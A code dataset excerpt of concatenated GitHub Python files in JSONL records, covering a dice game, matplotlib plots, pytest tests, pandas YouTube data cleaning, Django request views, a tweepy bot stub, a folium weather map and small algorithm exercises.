(Y or N)\"\n \"\\n(Your Total Score = %i, Your Current Score = %i) \"\n % (game.player, game.score[game.player], game.turnTotal)) in {'yes', 'y', ''}\n\n # loop, with nested loops, to roll dice, keep track of score, and player turn\n if playerRoll:\n # dieRoll object to get a random value from the Die class\n diceRoll = Dice().roll()\n print(' You rolled %i' % diceRoll)\n\n # loop to track if player rolls a 1. If they do, they lose their score for that round. Goes to next players turn\n if diceRoll == 1:\n print(' You rolled a 1. You lose %i points but still keep your previous %i'\n % (game.turnTotal, game.score[game.player]))\n game.turnTotal, game.player = 0, (game.player + 1) % game.playerCount\n else:\n game.turnTotal += diceRoll\n else:\n game.score[game.player] += game.turnTotal\n if game.score[game.player] >= game.finalScore:\n break\n print(' Player %i is sticking with %i points' % (game.player, game.score[game.player]))\n game.turnTotal, game.player = 0, (game.player + 1) % game.playerCount\n\n # display winners score\n print('\\nPlayer %i wins with a total score of %i' % (game.player, game.score[game.player]))\n\nmain()","repo_name":"Dreyke/Project-1","sub_path":"pig.py","file_name":"pig.py","file_ext":"py","file_size_in_byte":2346,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"70065955592","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\nclass PlotFunctions():\n \"\"\"\n Построение функций\n \"\"\"\n\n def sigmoid(self, x):\n return (1 / (1 + np.exp(-x)))\n\n def plot1(self):\n \"\"\"\n Построение sin(x) на интервале [0,1]\n \"\"\"\n x = np.linspace(0, np.pi, 100)\n y = np.sin(x)\n plt.subplot(2, 4, 1)\n plt.title('sin(x)')\n plt.plot(x, y)\n\n def plot2(self):\n \"\"\"\n Построение f(x) = sigmoid(x)\n \"\"\"\n x = np.linspace(-5, 5, 100)\n plt.subplot(2, 4, 2)\n plt.title('f(x) = sigmoid(x)')\n plt.plot(x, self.sigmoid(x))\n\n def plot3(self):\n \"\"\"\n Построение -f(x+6)*6 - 6\n \"\"\"\n x = np.linspace(-5, 5, 100)\n plt.subplot(2, 4, 3)\n plt.title('-f(x+6)*6-6')\n plt.plot(x, -(self.sigmoid(x)+6)*6 - 6)\n\n def plot4(self):\n \"\"\"\n Построение 2f(x+3)+1\n \"\"\"\n x = np.linspace(-5, 5, 100)\n plt.subplot(2, 4, 4)\n plt.title('2f(x+3)+1')\n plt.plot(x, 2*(self.sigmoid(x)+3)+1)\n\n def plot5(self):\n \"\"\"\n Построение одного графика из двух\n \"\"\"\n x = np.linspace(-5, 5, 100)\n plt.subplot(2, 4, 5)\n plt.title('Два в одном')\n plt.plot(x-5, self.sigmoid(x))\n plt.plot(x+5, self.sigmoid(-x))\n\n def plot6(self):\n \"\"\"\n Аппроксимация sin(x)\n \"\"\"\n x = np.linspace(-5, 5, 20)\n y = np.sin(x)\n t = np.polyfit(x, y, 7)\n f = np.poly1d(t)\n plt.subplot(2, 4, 6)\n plt.title('Аппроксимация sin(x)')\n plt.plot(x, y, 'o', x, f(x), 'r')\n\ndef main():\n plt.rcParams['figure.figsize'] = [15, 5]\n test = PlotFunctions()\n test.plot1()\n test.plot2()\n test.plot3()\n test.plot4()\n test.plot5()\n test.plot6()\n plt.show()\n\nif __name__ == '__main__':\n main()\n","repo_name":"avspit/prt","sub_path":"ex2/PlotFunction.py","file_name":"PlotFunction.py","file_ext":"py","file_size_in_byte":2016,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"24197521706","text":"from typing import Generator\nfrom main import app, get_user_info, markup_agent\nfrom models import MPMessage\nfrom fastapi.testclient import TestClient\nfrom tortoise.contrib.test import finalizer, initializer\nfrom tortoise import Tortoise, generate_schema_for_client\nimport 
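plot6 in the plotting record above approximates sin(x) with a degree-7 least-squares polynomial: np.polyfit returns the coefficients and np.poly1d wraps them into a callable. The fit step without the plotting:

import numpy as np

x = np.linspace(-5, 5, 20)
y = np.sin(x)

coeffs = np.polyfit(x, y, 7)      # least-squares coefficients, highest degree first
f = np.poly1d(coeffs)             # callable polynomial

print(np.max(np.abs(f(x) - y)))   # worst-case error on the sample points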
pytest, asyncio\n\n@pytest.fixture(scope='session')\ndef client() -> Generator:\n initializer(['main'])\n with TestClient(app) as c:\n yield c\n finalizer()\n\n@pytest.fixture(scope='session')\ndef event_loop(client : TestClient) -> Generator:\n yield client.task.get_loop()\n\ndef test_create_message(client : TestClient, event_loop : asyncio.AbstractEventLoop):\n async def create_msg():\n msg = await MPMessage.create(\n publisher='dnwj88cjqiX0a',\n content='fake message content'\n )\n return msg\n\n msg = event_loop.run_until_complete(create_msg())\n\n assert msg is not None\n assert msg.id > 0\n\n async def find_msg():\n return await MPMessage.first()\n\n msg = event_loop.run_until_complete(find_msg())\n assert msg is not None\n assert msg.id > 0\n assert msg.content == 'fake message content'\n assert not msg.content == 'fuck'\n # msg = await MPMessage_Pydantic.from_tortoise_orm(msg)\n # assert msg.id > 0\n # assert len(msg.content) > 10\n\ndef test_get_agent_info(client : TestClient, event_loop : asyncio.AbstractEventLoop):\n real_openid = 'o7OPz5NdjQFmShx_g2tcVAmlhZsU'\n agent_openid = 'o7OPz5EdwMjpPlaw0IyNNNBaBd8g'\n res = get_user_info(real_openid)\n agent_res = get_user_info(agent_openid)\n assert res.status_code == 200\n assert res['username'] == real_openid","repo_name":"colaftc/mpbot","sub_path":"tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":1639,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"36728690251","text":"import pandas as pd\nimport numpy as np\n# from matplotlib import pyplot as plt\n# import seaborn as sns\nimport datetime as dt\n\nclass CleanData(object):\n ''' Class with functions for manipulating trending video \n YouTube data.\n '''\n # def __init__(self):\n # pass\n\n # didn't work this way\n # def load_csv(self, file_path):\n # return pd.read_csv(file_path)\n\n def load_csv(file_path):\n return pd.read_csv(file_path)\n\n def load_json(file_path):\n return pd.read_json(file_path)\n\n def fill_nan(df):\n df[\"description\"] = df[\"description\"].fillna(value=\"\")\n return df\n\n def join_categories(df, df_json):\n # create category_name column from json files\n cat_dict = {}\n for cat in df_json[\"items\"]:\n cat_dict[int(cat[\"id\"])] = cat[\"snippet\"][\"title\"]\n df['category_name'] = df['category_id'].map(cat_dict)\n return df\n\n def date_format(df):\n # [\"trending_date\", \"publish_time\"]\n # [\"trend_end\", \"post_time\"]\n df[\"trend_end\"] = pd.to_datetime(df[\"trending_date\"], format=\"%y.%d.%m\")\n df[\"post_time\"] = pd.to_datetime(df[\"publish_time\"])\n return df\n\n def unique_reduce(df):\n # count # of days video appears on trending\n day_max = df[['video_id', 'trend_end']].groupby(['video_id']).max().iloc[:,0]\n day_min = df[['video_id', 'trend_end']].groupby(['video_id']).min().iloc[:,0]\n df[\"trend_begin\"] = df[\"video_id\"].map(day_min)\n delta_map = day_max - day_min + dt.timedelta(days=1)\n df[\"days_trending\"] = df[\"video_id\"].map(delta_map)\n # record initial viewcount on trending start\n min_map = df[['video_id', 'views']].groupby(['video_id']).min().iloc[:,0]\n df[\"views_initial\"] = df[\"video_id\"].map(min_map)\n # reduce df to most recent unique video data\n col_sel = ['video_id', 'title', 'channel_title', 'category_name', 'tags',\n 'views', 'views_initial','trend_begin', 'trend_end', 'days_trending',\n 'post_time', 'likes', 'dislikes', 'comment_count']\n return 
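The mpbot test module above reuses the TestClient's own event loop to drive ORM coroutines synchronously: each test wraps its async work in a local coroutine and hands it to run_until_complete. The bare pattern, independent of the web stack:

import asyncio

async def create_msg(content):
    await asyncio.sleep(0)        # stand-in for an awaited DB call
    return {"id": 1, "content": content}

loop = asyncio.new_event_loop()
msg = loop.run_until_complete(create_msg("fake message content"))
assert msg["id"] > 0
loop.close()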
 return df[col_sel].groupby(['video_id']).max().copy()\n\n\n","repo_name":"truejimfrank/TrendTagsGraph","sub_path":"src/TrendClass.py","file_name":"TrendClass.py","file_ext":"py","file_size_in_byte":2141,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"36708413216","text":"n = int(input())\na = list(map(int, input().split()))\nfor i in range(len(a) - 1, -1, -1):\n if a[i] == 1:\n cntnum = 2\n num = 1\n for j in range(i + 1, len(a)):\n if a[j] == cntnum:\n num += 1\n cntnum += 1\n print(n - num)\n exit()\n\nprint(-1)\n","repo_name":"kanade9/kyopro","sub_path":"AtCoder/ABC D/148.py","file_name":"148.py","file_ext":"py","file_size_in_byte":314,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"39787561883","text":"import numpy as np\nfrom .jit_compiled_functions import (sampling_get_potential_targets,\n sampling_sample_from_array_condition)\n\n\nclass BaseSamplingSingleSpecies:\n \"\"\"\n Base Class for single species sampling.\n \"\"\"\n def __init__(self, target_species=None, **kwargs):\n if target_species is None:\n raise ValueError(\"No agent object provided for the sampling. Should be provided using kwarg \"\n \"'target_species'.\")\n self.target_species = target_species\n\n\nclass SamplingSingleSpecies:\n \"\"\"\n Introduce the methods for sampling a single species\n \"\"\"\n def __init__(self, **kwargs):\n pass\n\n def sample_proportion_from_array(self, array_proportion, condition=None, position_attribute='position',\n return_as_pandas_df=False, eliminate_sampled_pop=False):\n \"\"\"\n Take as input an array giving the proportion of agents to sample in each vertex.\n\n :param array_proportion: 1D array of float. array_proportion[i] is the probability with which an agent living in the\n vertex of index i is sampled.\n :param condition: optional, 1D array of bool, default None. If not None, tells which agents can be sampled.\n :param position_attribute: optional, string, default 'position'. Tells which attribute of the agents should\n be used as position.\n :param return_as_pandas_df: optional, boolean, default False. If True, return the sample as a pandas dataframe.\n :param eliminate_sampled_pop: optional, boolean, default False. If True, the sampled agents are removed from\n the population.\n\n :return: a DataFrameXS if return_as_pandas_df is False, a pandas dataframe otherwise. 
The returned DF is\n the sample of the population taken from df_population\n \"\"\"\n targets = sampling_get_potential_targets(self.target_species.df_population[position_attribute],\n array_proportion)\n if condition is not None:\n targets = targets & condition\n\n rand = np.random.uniform(0, 1, (targets.sum(),))\n\n sampled = sampling_sample_from_array_condition(array_proportion,\n self.target_species.df_population[position_attribute],\n rand, targets)\n\n","repo_name":"sampy-project/sampy-main","sub_path":"sampy/intervention/sampling.py","file_name":"sampling.py","file_ext":"py","file_size_in_byte":2374,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"27"} +{"seq_id":"31047665983","text":"\"\"\"\nAuthor: Le Tuan Luc\nDate: 2021/09/05\nProgram: project_03_page_203.py\nProblem:\n Elena complains that the recursive newton function in Project 2 includes an extra argument for the estimate.\n The function’s users should not have to provide this value, which is always the same, when they call this function.\n Modify the definition of the function so that it uses a keyword argument with the appropriate default value, and call the function without a second argument to demonstrate that it solves this problem\nSolution:\n Default parameter estimate = 1.0\n Solved at project_02_page_203.py\n\"\"\"\nimport math\n\n\ndef newton(x, estimate=1.0):\n TOLERANCE = 0.000001\n estimate = (estimate + x / estimate) / 2\n difference = abs(x - estimate ** 2)\n if difference <= TOLERANCE:\n return estimate\n return newton(x, estimate)\n\n\ndef main():\n x = input(\"Enter a positive number: \")\n try:\n x = float(x)\n print(\"The square root of \", x, \"is \", round(newton(x), 2))\n print(\"Python's estimate: \", math.sqrt(x))\n main()\n except ValueError:\n print(\"Have a nice day!\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"FxLuc/python","sub_path":"chapter06/page_203/project_03_page_203.py","file_name":"project_03_page_203.py","file_ext":"py","file_size_in_byte":1171,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"33518492676","text":"\r\n#importing data\r\nfrom data import *\r\nfrom map_styles import *\r\nfrom location import *\r\n\r\nfrom random import randint\r\nfrom datetime import datetime\r\nfrom time import sleep\r\nfrom typing import List\r\nfrom dataclasses import dataclass\r\nimport json\r\nimport os\r\n\r\nimport pandas as pd\r\nimport geopandas as gpd\r\nimport folium\r\nfrom pyodide.http import open_url\r\nimport js\r\nimport asyncio\r\nfrom requests import request\r\n\r\n#ignore warnings\r\nimport warnings\r\nwarnings.filterwarnings('ignore')\r\n\r\n#constants\r\nprint('INFO: Loading Bondaries')\r\nFSAS_GPD = gpd.read_file('boundaries.geojson').rename(columns={'POSTCODE': 'FSA'})\r\nFSAS_GPD['centroid'] = FSAS_GPD.centroid\r\n\r\nprint('INFO: Creating Paths')\r\n#create a directory to store the scraped data\r\nos.mkdir(os.getcwd()+'/jsons/')\r\nJSONS_PATH = os.getcwd()+'/jsons/'\r\n\r\nprint('INFO: Loading Locations')\r\n#Initiate all the locations\r\nLOCATIONS = []\r\nfor loc in LOCATIONS_DICT.values():\r\n LOCATIONS.append(Location(loc['retailerSiteId'], loc['retailOutletLocationSk'], loc['name'], loc['acronym'], loc['region'], loc['business'], loc['kind'], loc['address'], loc['geo_coordinates']))\r\n\r\nclass FSA: \r\n '''\r\n A class to represent canadian forward sortation areas i.e. 
FSA.\r\n ...\r\n Attributes\r\n ----------\r\n Methods\r\n ----------\r\n '''\r\n def __init__(self, fsa_name: str) -> None:\r\n self.fsa_name: str = fsa_name\r\n self.geometry = FSAS_GPD[FSAS_GPD['FSA'] == fsa_name].geometry.values\r\n self.centroid = FSAS_GPD[FSAS_GPD['FSA'] == fsa_name]['centroid'].values\r\n\r\n def __repr__(self) -> str:\r\n return self.fsa_name\r\n\r\nclass Zone: \r\n '''\r\n A class to represent OSP Zone areas, derived from the csv file that can be exported from OSP's website.\r\n link: https://delivery-area.voila.osp.tech/delivery-zones\r\n ...\r\n Attributes\r\n ----------\r\n Methods\r\n ----------\r\n '''\r\n def __init__(self, serviced_by_location: Location, zone_name: str, zone_business: str, zone_fsas: List) -> None:\r\n self.serviced_by: Location = serviced_by_location\r\n self.name: str = zone_name\r\n self.business: str = zone_business\r\n self.fsas: List[FSA] = []\r\n\r\n for fsa in zone_fsas:\r\n self.fsas.append(FSA(fsa))\r\n \r\n def __repr__(self) -> str:\r\n return f\"Zone: {self.name} | Serviced by: {self.serviced_by.acronym}\"\r\n \r\n @property\r\n def geometry(self):\r\n geometries = []\r\n for fsa in self.fsas:\r\n #work around to ignore empty geometries\r\n if len(fsa.geometry) > 0:\r\n geometries.append(fsa.geometry[0])\r\n return gpd.GeoSeries(geometries).unary_union\r\n\r\n @property\r\n def centroid(self):\r\n return self.geometry.centroid\r\n\r\ndef process_json_reponse(city, data_json):\r\n filtered_data = []\r\n for obs in data_json['sevendays']['periods']:\r\n filtered_data.append({ \r\n \"scrape_date\" : datetime.now().strftime(\"%d/%m/%Y %H:%M:%S\"),\r\n \"placecode\" : city['placecode'],\r\n \r\n \"city_prov\" : city['prov'],\r\n \"city_name\" : city['city'],\r\n \"city_lat\" : city['lat'],\r\n \"city_lon\" : city['lon'],\r\n \"city_zone\" : city['zone'],\r\n \r\n \"date_complete\" : obs['cdate'],\r\n \"Date\" : obs['super_short_dayanddate'],\r\n \"weekday\" : obs['super_short_day'],\r\n \"month_day\" : obs['super_short_date'],\r\n\r\n \"Period\" : \"AM\",\r\n\r\n \"Wind Direction\" : obs['wd'],\r\n \"Wind Speed\" : int(obs['metric_windSpeed']),\r\n \"Wind Speed Unit\" : obs['metric_windSpeed_unit'],\r\n \"Wind Gust\" : int(obs['windGust']),\r\n \"Wind Gust Unit\" : obs['gust_unit'],\r\n \"Feels Like\" : int(obs['metric_feelsLike']),\r\n \"Feels Like Unit\" : obs['metric_feelsLike_unit'],\r\n \"Temperature\" : int(obs['tmac']),\r\n \"Temperature Unit\" : obs['metric_temperatureMax_unit'],\r\n \"Rain\" : obs['r'],\r\n \"Rain Unit\" : obs['ru'],\r\n \"Snow\" : obs['s'],\r\n \"Snow Unit\" : obs['su'],\r\n \"POP\" : int(obs['pdp']),\r\n \"Description\" : obs['itd'],\r\n })\r\n \r\n filtered_data.append({ \r\n \"scrape_date\" : datetime.now().strftime(\"%d/%m/%Y %H:%M:%S\"),\r\n \"placecode\" : city['placecode'],\r\n \r\n \"city_prov\" : city['prov'],\r\n \"city_name\" : city['city'],\r\n \"city_lat\" : city['lat'],\r\n \"city_lon\" : city['lon'],\r\n \"city_zone\" : city['zone'],\r\n \r\n \"date_complete\" : obs['cdate'],\r\n \"Date\" : obs['super_short_dayanddate'],\r\n \"weekday\" : obs['super_short_day'],\r\n \"month_day\" : obs['super_short_date'],\r\n\r\n \"Period\" : \"PM\",\r\n\r\n \"Wind Direction\" : obs['windDirectionNight'],\r\n \"Wind Speed\" : int(obs['windSpeedNight_kmh']),\r\n \"Wind Speed Unit\" : obs['windSpeedNight_unit'],\r\n \"Wind Gust\" : int(obs['windGustNight']),\r\n \"Wind Gust Unit\" : obs['gustNight_unit'],\r\n \"Feels Like\" : int(obs['feelsLikeNight']),\r\n \"Feels Like Unit\" : 
obs['feelsLikeNight_unit'],\r\n \"Temperature\" : int(obs['tmic']),\r\n \"Temperature Unit\" : obs['metric_temperatureMin_unit'],\r\n \"Rain\" : obs['rr'],\r\n \"Rain Unit\" : obs['ru'],\r\n \"Snow\" : obs['sr'],\r\n \"Snow Unit\" : obs['su'],\r\n \"POP\" : int(obs['pnp']),\r\n \"Description\" : obs['itn']})\r\n \r\n return filtered_data\r\n\r\ndef get_html_sandwich(city, df_weather):\r\n ##filter weather_df to get only that town's data\r\n data_df = df_weather[df_weather['placecode'] == city['placecode']]\r\n html_top_bun = f'''\r\n \r\n \r\n \r\n \r\n \r\n

{city['city']}

\r\n Data Source: The Weather Network. Last Update: {datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")} \r\n
\r\n \r\n \r\n '''\r\n\r\n html_table = f'''\r\n \r\n \r\n \r\n \r\n \r\n {data_df[['Date', 'Period', 'Description', 'Feels Like', 'Temperature', 'Rain', 'Snow', 'POP', 'Wind Direction', 'Wind Speed', 'Wind Gust']].head(14).to_html(table_id=\"summary\", index=False)}\r\n \r\n .\r\n '''\r\n return ''.join([html_top_bun, html_table])\r\n\r\ndef clear_folder(path):\r\n for i in os.listdir(path):\r\n os.remove(i)\r\n\r\nasync def scrape_data(cities, path):\r\n total_cities = len(cities)\r\n for i, city in enumerate(cities): \r\n #TODO error handling in case data can't get fetched\r\n #data = await json.load(open_url(f\"https://www.theweathernetwork.com/api/data/{city['placecode']}/\"))\r\n response = request(f\"https://www.theweathernetwork.com/api/data/{city['placecode']}/\")\r\n data = response.json()\r\n with open(f\"{path+city['placecode']}.json\", \"w\") as file:\r\n await json.dump(data, file)\r\n js.document.getElementById(\"refresh_progress\").style.width = str((len(os.listdir(path))/total_cities)*100)+'%'\r\n\r\ndef refresh_data(cities, path):\r\n clear_folder(path)\r\n asyncio.ensure_future(scrape_data(cities, path))\r\n\r\ndef main(): \r\n print(os.listdir(JSONS_PATH))\r\n #jsons.extend(process_json_reponse(city, data))\r\n #print(city['city'])\r\n #\r\n #df_weather = pd.DataFrame(jsons)\r\n\r\n #all_fsas = []\r\n #col_zones: List[Zone] = []\r\n #for key, value in ZONES.items():\r\n # zone_location = \"CFC\"\r\n # zone_fsas = value\r\n # zone_business = \"CFC\"\r\n # col_zones.append(Zone(zone_location, key, zone_business, zone_fsas))\r\n # all_fsas.extend(value)\r\n\r\n#\r\n ##instantiate map\r\n #m = folium.Map(location=[45.4769531, -73.7979043], zoom_start=8, tiles='cartodb positron')\r\n#\r\n #folium.raster_layers.WmsTileLayer(\r\n # url = 'https://geo.weather.gc.ca/geomet?',\r\n # layers = 'RADAR_1KM_RSNO',\r\n # transparent = True, \r\n # control = True,\r\n # fmt=\"image/png\",\r\n # name = 'Canada Weather Radar Snow',\r\n # overlay = True,\r\n # show = False,\r\n # opacity = 0.5\r\n #).add_to(m)\r\n#\r\n #legend_html = '''\r\n #{% macro html(this, kwargs) %}\r\n #
\r\n #\r\n #
\r\n #{% endmacro %}\r\n #'''\r\n #legend = folium.branca.element.MacroElement()\r\n #legend._template = folium.branca.element.Template(legend_html)\r\n#\r\n #folium.raster_layers.WmsTileLayer(\r\n # url = 'https://geo.weather.gc.ca/geomet?',\r\n # layers = 'RADAR_1KM_RRAI',\r\n # transparent = True, \r\n # control = True,\r\n # fmt=\"image/png\",\r\n # name = 'Canada Weather Radar Rain',\r\n # overlay = True,\r\n # show = False,\r\n # opacity = 0.65\r\n #).add_to(m)\r\n#\r\n ##change map tile\r\n #folium.TileLayer('stamentoner').add_to(m)\r\n #folium.TileLayer('OpenStreetMap').add_to(m)\r\n#\r\n #zones_group = folium.FeatureGroup(name='OSP Zones').add_to(m)\r\n ##add the existing zones geometries\r\n #for zone in col_zones:\r\n # fillColor = STYLES[zone.name]['fillColor']\r\n # color = STYLES[zone.name]['color']\r\n # tooltip = [zone.name]\r\n # zones_group.add_child(folium.GeoJson(\r\n # data=zone.geometry, \r\n # style_function=lambda x, fillColor=fillColor, color=color: {\r\n # \"fillColor\": fillColor,\r\n # \"color\": color,\r\n # },\r\n # tooltip=tooltip))\r\n#\r\n ##add location markers\r\n #markers_group = folium.FeatureGroup(name=\"Location Markers\").add_to(m)\r\n #markers_group.add_child(folium.Marker(location=[43.70300, -79.38900], popup='VAUGHAN CFC'))\r\n #markers_group.add_child(folium.Marker(location=[43.616401, -79.538833], popup='ETB SPOKE'))\r\n #markers_group.add_child(folium.Marker(location=[45.4769531, -73.7979043], popup='POINTE-CLAIRE CFC'))\r\n #markers_group.add_child(folium.Marker(location=[46.8400925, -71.2760664], popup='QBC SPOKE'))\r\n #markers_group.add_child(folium.Marker(location=[45.378810, -75.631818], popup='OTTAWA SPOKE'))\r\n#\r\n ##add circles for the \r\n #weather_observations_group = folium.FeatureGroup(name=\"Weather Observations\").add_to(m)\r\n#\r\n #for city in CITIES:\r\n # pop = get_html_sandwich(city, df_weather)\r\n # weather_observations_group.add_child(folium.CircleMarker(location=[city['lat'], city['lon']], popup=pop, radius=10, color='#69b3a2', fill=True, fill_color='#69b3a2'))\r\n#\r\n #folium.LayerControl().add_to(m)\r\n#\r\n #m.get_root().add_child(legend)\r\n#\r\n #fig = folium.branca.element.Figure(height=\"100%\")\r\n #fig.add_to(m)\r\n#\r\n #df_summary = df_weather[df_weather['Period']=='AM'].pivot(index=['city_prov', 'city_zone', 'city_name'], columns=['month_day'], values=['Snow'])\r\n#\r\n #display(HTML(m._repr_html_()), target=\"folium\")\r\n\r\nmain()","repo_name":"rafaellucas3/weatherwatch","sub_path":"code/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":12329,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"74823555271","text":"import numpy as np\nimport m_funcutil as m_fun\nimport pdb\n\n'''\npredict inputdata in the type of vector. predict value is 0~9\ninput : inputVec(one of the inputdata(1,784)), trainparaW(trained paraW (10,784))\noutput : predict value (scalor 0~9)\n'''\ndef predict_vec(inputVec, trainparaW, coeffi, penaModel):\n classNum, dimNum = trainparaW.shape\n\n predict_vec = []\n epochIdx = 0\n\n for i in range(classNum):\n predictVal = m_fun.softmax(inputVec, trainparaW, i, coeffi, penaModel)\n predict_vec = predict_vec + [predictVal]\n epochIdx += 1\n\n Max = np.amax(predict_vec)\n #output is place of Max(0~9)\n predict = np.where(predict_vec == Max)[0]\n\n return predict\n\n'''\npredict inputdata in the type of array. 
the predicted values are 0~9, and the output is a vector.\ninput : inputdata, trainparaW(trained paraW (10,784))\noutput : prediction vector. Its elements are the predicted values for each input vector.\n'''\ndef predict_array(inputArray, trainparaW, coeffi, penaModel):\n dataNum, dimNum = inputArray.shape\n record = np.zeros((dataNum,1))\n\n for i in range(dataNum):\n inputVec = inputArray[i]\n predictVal = predict_vec(inputVec, trainparaW, coeffi, penaModel)\n record[i] = predictVal\n\n return record\n\n'''\ncompute the percentage of correct predictions.\ninput : predicted vector, test's outputdata in the type of vector.\noutput : correct percentage. (scalar)\n'''\ndef accuracy(predictVec, t_outputVec):\n dataNum = predictVec.shape[0]\n\n judge_vec = predictVec - t_outputVec\n correctlist = np.where(judge_vec == 0)[0]\n correctNum = len(correctlist)\n\n percentage = correctNum / dataNum\n\n return percentage\n","repo_name":"yuuuuuya/perceptron","sub_path":"m_src/m_predictutil.py","file_name":"m_predictutil.py","file_ext":"py","file_size_in_byte":1661,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"41676555284","text":"import os\nimport tweepy as tp\nfrom time import sleep\n\n# this is just a simple test script, nothing more, nothing less.\n\n# fill your api keys and access tokens\n\nconsumer_key = 'your-consumer-key'\nconsumer_secret = 'your-consumer-secret'\naccess_token = 'your-access-token'\naccess_secret = 'your-access-secret'\n\nauth = tp.OAuthHandler(consumer_key, consumer_secret)\nauth.set_access_token(access_token, access_secret)\n\napi = tp.API(auth)\n\nuser = api.me()\n\nprint(user.name)\nprint(user.location)","repo_name":"n00bsaiboth/RaspberryPi-Twitterbot","sub_path":"code/tweetbot.py","file_name":"tweetbot.py","file_ext":"py","file_size_in_byte":489,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"72173993673","text":"from django.http import HttpResponse\nfrom django.shortcuts import render\nimport json\n\n# Create your views here.\ndef weather(request, city, year):\n '''1. Passing parameters via the URL path'''\n return HttpResponse('URL path parameters - city: %s year: %s' % (city, year))\n\ndef query_user(request):\n param_dict = request.GET\n print(request.GET)\n print(type(request.GET))\n name = param_dict.get('name', 'haha')\n age = param_dict.getlist('age')\n return HttpResponse('Query string parameters: %s %s' % (name, age))\n\n\ndef body_form(request):\n param_dict = request.POST\n print(request.POST)\n print(type(request.POST))\n name = param_dict.get('name', '')\n age = param_dict.get('age', '')\n return HttpResponse('Request body parameters (form format): %s %s' % (name, age))\n\n\ndef body_notform(request):\n b_data = request.body\n print(type(b_data))\n json_str = b_data.decode()\n print(type(json_str))\n my_dict = json.loads(json_str)\n print(type(my_dict))\n return HttpResponse('Request body parameters (non-form data): %s' % my_dict)\n\n\ndef header(request):\n dict = request.META\n content_type = dict.get('CONTENT_TYPE', '')\n return HttpResponse('Request header parameters: %s' % content_type)\n\n\ndef others(request):\n method = request.method\n print(method)\n user = request.user\n print(user)\n path = request.path\n print(path)\n encoding = request.encoding\n print(encoding)\n files = request.FILES\n
 return HttpResponse('6. Other common attributes of the HttpRequest object')","repo_name":"jietui/django_project","sub_path":"practice/request_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1565,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"9086212598","text":"# Sometimes people repeat letters to represent extra feeling, such as \"hello\" -> \"heeellooo\", \"hi\" -> \"hiiii\". In\n# these strings like \"heeellooo\", we have groups of adjacent letters that are all the same: \"h\", \"eee\", \"ll\", \"ooo\".\n#\n# For some given string S, a query word is stretchy if it can be made to be equal to S by any number of applications\n# of the following extension operation: choose a group consisting of characters c, and add some number of characters\n# c to the group so that the size of the group is 3 or more.\n#\n# For example, starting with \"hello\", we could do an extension on the group \"o\" to get \"hellooo\", but we cannot get\n# \"helloo\" since the group \"oo\" has size less than 3. Also, we could do another extension like \"ll\" -> \"lllll\" to\n# get \"helllllooo\". If S = \"helllllooo\", then the query word \"hello\" would be stretchy because of these two\n# extension operations: query = \"hello\" -> \"hellooo\" -> \"helllllooo\" = S.\n#\n# Given a list of query words, return the number of words that are stretchy.\n\n# solution:\n# We first split S into groups of identical letters and record the length of each group. For example, when S is abbcccddddaaaaa, we get 5 letter groups, namely a, b, c, d, a, with lengths [1, 2, 3, 4, 5].\n#\n# For each word in words, if it can be stretched into S, it must have the same letter groups as S. For each group, suppose it has c1 letters in S and c2 letters in word; then there are the following cases:\n#\n# If c1 < c2, word cannot be stretched into S;\n#\n# If c1 >= 3, we only need to add c1 - c2 letters;\n#\n# If c1 < 3, stretching would have to grow the group to at least 3 letters, so no letters can be added here and c1 == c2 must hold.\n#\n# If every letter group of word satisfies the above conditions, then word can be stretched into S.\n\ndef expressiveWords(S, words):\n count = 0\n for word in words:\n if canStretchy(S, word) is True:\n count += 1\n return count\n\n\ndef getKeyTable(str):\n table = []\n for ele in str:\n if not table:\n table.append([ele, 1])\n else:\n if ele == table[-1][0]:\n table[-1][1] += 1\n else:\n table.append([ele, 1])\n return table\n\n\ndef canStretchy(S, word):\n counter_S = getKeyTable(S)\n counter_word = getKeyTable(word)\n for i in range(len(counter_S)):\n if len(counter_S) != len(counter_word):\n break\n if counter_S[i][0] != counter_word[i][0]:\n break\n if counter_S[i][1] < 3 and counter_S[i][1] != counter_word[i][1]:\n break\n if i == len(counter_S) - 1:\n return True\n return False\n\n\nprint(expressiveWords('helloo', [\"hello\"]))\n","repo_name":"riCoYanG-byte/leetcode","sub_path":"strings/No908.py","file_name":"No908.py","file_ext":"py","file_size_in_byte":2732,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"27"} +{"seq_id":"19542761945","text":"# -*- coding: utf-8 -*-\n\"\"\"\nSpyder Editor\n\nThis is a temporary script file.\n\"\"\"\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport matplotlib.patches as patches\n\n\ndef scatter_plot(df, x_col, y_col, cate_col=None, title=None):\n \"\"\"\n 2D scatter plot\n :Params: df: dataframe containing x_axis, y_axis, category\n :Params: x_col: x_axis, str\n :Params: y_col: y_axis, str\n :Params: cate_col: category variable, str\n :Params: title: title of graph, str\n ----------\n \"\"\"\n x_str = x_col.capitalize()\n y_str = y_col.capitalize()\n categories = np.unique(df[cate_col])\n colors = [plt.cm.tab10(i/float(len(categories)-1)) \n
